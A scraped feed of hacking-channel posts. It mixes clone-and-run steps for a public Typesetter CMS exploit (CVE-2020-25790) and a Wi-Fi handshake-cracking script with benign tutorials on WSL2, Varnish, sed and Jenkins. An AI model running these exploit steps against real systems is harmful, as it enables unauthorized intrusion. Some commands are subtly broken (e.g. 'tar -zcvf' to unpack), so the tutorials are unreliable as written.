▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


THAT'S IT
🦑Let's secure & hack New Unpatched Vulnerability in Typesetter CMS 5.1.
#Vulnerabilities


1) git clone https://github.com/t0gu/CVE-2020-25790

2) cd CVE-2020-25790

3) $ python3 -m pip install -r requirements.txt


4) $ python3 main.py -l admindb -p secret -u http://localhost:8090/old_typsetter/Typesetter/index.php -f simple.php.zip

5) usage: main.py [-h] -p PASSWORD -l LOGIN -u URL

==> Exploit for CVE 2020-25790

optional arguments:
-h, --help show this help message and exit
-p PASSWORD, --password PASSWORD
==> admin password
-l LOGIN, --login LOGIN
==> admin login
-u URL, --url URL ==> main URL

USE FOR LEARN !!

@UndercodeTesting verified
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Free limited time: 4,5 Rating https://www.udemy.com/course/code-your-first-game/

🦑FREE VIRL Topologies :

This folder includes the Virtual Internet Routing Lab Personal Edition (VIRL PE) topologies used in [The security penetration testing (the art of hacking series) video course](https://www.safaribooksonline.com/library/view/security-penetration-testing/9780134833989/sptt_00_08_07_00.html).

[VIRL](http://get.virl.info/) is a powerful network virtualization and orchestration platform that enables the development of highly accurate models of existing or planned networks.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to enable WSL2 (Windows Subsystem for Linux version
2) and install the latest kernel

1) Microsoft has worked with Canonical to offer a complete Ubuntu-based Bash shell environment that runs on top of that subsystem, and it is now possible to run full Linux distributions. Technically it's not Linux at all.

2) Linux is the underlying operating system kernel that is not available here. Instead, it allows you to run the Bash shell and the same binaries that you normally run on Ubuntu Linux. Free software proponents often argue that the average Linux operating system should be called “GNU / Linux” because in fact there are many GNU programs running on the Linux kernel. The Bash shell you get is actually all these GNU utilities and other software.

3) This feature was originally called “Bash on Ubuntu on Windows,” but it also allowed you to run Zsh and other command line shells. It now supports other Linux distributions as well. You can choose openSUSE Leap or SUSE Enterprise Server, Fedora or Kali Linux over Ubuntu.

4) There are some limitations here. It does not yet support background server software and does not officially work with graphical Linux desktop applications. Not all command line applications work as well as the feature is not perfect.

5) WSL2 is disabled by default on Windows. To enable it, you can use the graphical interface or the command line. To enable WSL2 at the command line, press Win + x and select " Windows PowerShell (administrator) " in the menu that opens :

6) It's important to open PowerShell with elevated privileges.

Run in it:

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

7) Wait for the download and execution to finish.

Restart your computer by pressing Enter.

8) Now open PowerShell as administrator again and run:

dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart<font></font>

dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

9)Restart your computer again.

Download and install the latest WSL2 Linux Kernel from here: https://aka.ms/wsl2kernel

10) Open PowerShell again as administrator and run:

wsl --set-default-version 2


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New tip Installing and Configuring Varnish: Part 1: How to Install Varnish on Debian and Ubuntu
Alexey 10/16/2020 0 Web server Hitch , Varnish Cache , caching


1. How to install Varnish on Debian and Ubuntu

1.1 How Varnish Caching Works for Apache

1.2 Correct Port Configuration for Varnish and Apache

1.3 Installing Varnish

1.4 Configuring Apache to Work with Varnish

1.5 Configuring Varnish to Work with Apache and Hitch

1.6 Checking Varnish and Apache

1.7 Configuring Hitch to Work with Varnish

1.8 Error "ERR_TOO_MANY_REDIRECTS"

1.9 How to tell if Varnish is running

1.10 How to Check Varnish Cache Speed

1.11 Renewing SSL Certificate Using Varnish and Hitch

1.12 Varnish is useless without configuration

2. How to set up Varnish, example rules

3. The Varnish Utilities

4. Varnish modules

🦑How Varnish Caching Works for Apache
To understand the essence of web server caching , you need to remember how a website works

1) There is a request from a user to show a certain page

2) Template files and source files are read from disk

3) The necessary information is retrieved from the database

4) Performs processing of information from the database

5) A page is formed that is sent to the user

6) Most of the simplest queries start the described chain of actions. Moreover, the number of operations performed can be even greater, or applications at the system level can be used to form the content of a web page.

7) And so every time - for each user request, the page is rebuilt.

🦑The essence of caching is that the page is created once and after that it is stored in the cache, which is kept in RAM. If a request comes back to show an already cached page

Benefits of using Varnish:

1) Varnish Cache boosts the speed of your content rich website.

2) Fast loading speeds help improve user experience and retain customers.

3) Your web server can efficiently handle website traffic with improved and smooth performance.

4) In the event of a server crash, your site will still work, delivering cached content.

5) You no longer need to update your existing hosting package from time to time as it can support high traffic. This, in turn, makes your site scalable.

6) A high website speed increases the likelihood that your website will hit search engines and show up in search results.

7) Varnish also reduces the number of servers required.


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑wifi hacking:

1)Start monitor mode

2)Stop monitor mode

3)Scan Networks

4)Getting Handshake

5)Create wordlist

6)Install Wireless tools

7)WPS Networks attacks

8)Scan for WPS Networks

9)Crack Handshake with rockyou.txt

10)Crack Handshake with wordlist

11)Crack Handshake without wordlist

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) sudo apt-get update && apt-get install git

2) sudo git clone https://github.com/ankit0183/Wifi-Hacking

3) cd Wifi-Hacking/

4) sudo python3 Wifi-Hacking.py


✅git 2020
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IP TRACKI NG TOOLS :

* [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.

* [Blue Team Training Toolkit (BT3)](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.

* [Caldera](https://github.com/mitre/caldera) - Automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CKâ„¢) project.

* [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - Modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.

* [Metta](https://github.com/uber-common/metta) - Information security preparedness tool to do adversarial simulation.

* [Network Flight Simulator](https://github.com/alphasoc/flightsim) - Lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ALL IN ONE FREE GAME HACKING ULTIMATE TUTORIALS & TOOLS :

https://github.com/dsasmblr/game-hacking

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Shell uses sed command to delete specific lines :

The sed command deletes a specific line number
Delete row N

sed -i 'Nd' filename
Delete rows N~M

sed -i 'N,Md' filename # file[N,M]
Delete the line number represented by the shell variable (used with for statements)

sed -i "${var1},${var2}d" filename #
Delete the last line

sed -i '$d' filename
The sed command deletes lines containing specific characters
Delete the line containing "xxx"

sed -i '/xxx/d' filename

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE CTF :

CTF 1: SEGV Hunt - Find a critical buffer overflow bug in glibc. Language: C - Difficulty level:
https://securitylab.github.com/ctf/segv

CTF 2: U-Boot Challenge - Follow in the footsteps of our security research team and discover 13 vulnerabilities un U-Boot. Language: C - Difficulty level:
https://securitylab.github.com/ctf/uboot

CTF 3: XSS-unsafe jQuery plugins - Find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. Language: JavaScript - Difficulty level:
https://securitylab.github.com/ctf/jquery

🦑start tutorials :

https://help.semmle.com/QL/ql-training/intro-to-ql.html

https://help.semmle.com/QL/learn-ql/beginner/ql-tutorials.html

https://lgtm.com/help/lgtm/console/ql-cpp-basic-example

https://blog.semmle.com/python-code-analysis-ql/

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑real wifi hacking for android no root :

https://play.google.com/store/apps/details?id=com.ngb.wpsconnect&hl=en_US

https://play.google.com/store/apps/details?id=com.tester.wpswpatester&hl=en_US

https://play.google.com/store/apps/details?id=com.halo.wifikey.wifilocating&hl=en_IN

https://www.kali.org/kali-linux-nethunter/

https://play.google.com/store/apps/details?id=wifi.kill.com&hl=en_US

https://play.google.com/store/apps/details?id=com.xti.wifiwarden&hl=en_IN

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Incident Response

* [Cyphon](https://www.cyphon.io/) - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.

* [Demisto](https://www.demisto.com/community/) - Demisto community edition(free) offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations (like Active Directory, PagerDuty, Jira and much more...)

* [FIR](https://github.com/certsocietegenerale/FIR/) - Fast Incident Response (FIR) is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike

* [RTIR](https://www.bestpractical.com/rtir/) - Request Tracker for Incident Response (RTIR) is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑To save data in the cache, you need to use the description file manifest file to list the resources to be downloaded and cached

The manifest file can be divided into three parts:

1) CACHE MANIFEST-files listed under this heading will be cached after the first download

2) NETWORK-The files listed under this heading require a connection to the server and will not be cached

3) FALLBACK-The documents listed under this heading specify the fallback page when the page is inaccessible (such as a 404 page)
When online, the user agent will read the manifest every time he visits the page. If it is found to be changed, it will reload all the resources in the list


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS LASTEST VERSION FROM MICRSOFT OFFICIAL WEBSITE DIRECT :

WIN 7 X64

https://download.microsoft.com/download/E/A/8/EA804D86-C3DF-4719-9966-6A66C9306598/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_HOMEPREMIUM_x64FRE_en-us.iso

WIN 10 2020 OCTOBER X64

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x64.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=d32bb0ef976921bb6540b49df2562e0a

X32

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x32.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=f0604e8764288406d5b11ab611710f62

ANYTHING ELSE YOU NEED FROM MICROSOFT.COM REQUEST @Undercode_Testing
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Jenkins project construction process under linux (centos7 as an example)


Install jdk

1. Download jdk and take jdk-8u261-linux-x64.tar.gz installation as an example

2. Create java folder

cd /usr/local mkdir java

3. Then unzip the jdk package

tar -zcvf jdk-8u261-linux-x64.tar.gz

4. Configure environment variables

vi /etc/profile

5. Join

6. Save and exit

:wq

7. Effective configuration file

source /etc/profile

8. Check the jdk version

java -version

2. Install node

1. Go to the official website to download the file that matches your own system:

English website: https://nodejs.org/en/download/

Take download node-v12.13.0-linux-x64.tar as an example

2. Unzip

cd /usr/local tar -xvf node-v12.13.0-linux-x64.tar

3. Check the node version

node -v

3. Install go

1. Download

Download link: https://golang.google.cn/dl/

Take go1.15.2.linux-amd64.tar.gz as an example

2. Unzip

cd /usr/local tar -zcvf go1.15.2.linux-amd64.tar.gz

3. Configure environment variables

vi /etc/profile

4. Join

Note: go get cannot be accessed directly in China, so you must first set up a proxy (to solve the problem that some packages of go cannot be downloaded)

1). Enable the go modules feature to open the proxy mode

export GO111MODULE=on

2). Set the GOPROXY environment variable to set the proxy address

export GOPROXY=https://goproxy.io

5. Save and exit

:wq

6. Effective configuration file

source /etc/profile

7. View the go version

go version

Install jenkins

1. Download linux jenkins, official website address https://pkg.jenkins.io/redhat/

2. Create a folder in the root directory

mkdir jenkins

3. After the download is complete, put jenkins-2.174-1.1.noarch.rpm into the jenkins directory

Enter the jenkins directory to decompress and decompress the command:

rpm -ivh jenkins-2.174-1.1.noarch.rpm

After decompression is successful, check the directory where jenkins is installed

whereis jenkins

4. Find the jdk installation path

ps -ef|grep java


5. Modify the /etc/init.d/jenkins file and configure the jdk installation path

vi /etc/init.d/jenkins

6. Start jenkins

7. Visit http://server IP:8080/ and enter the jenkins password

8. Install Jenkins custom recommended plugins

9. Create Jenkins user

10. Configure git, enter the global tool configuration, so far jenkins is installed, and then log in


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁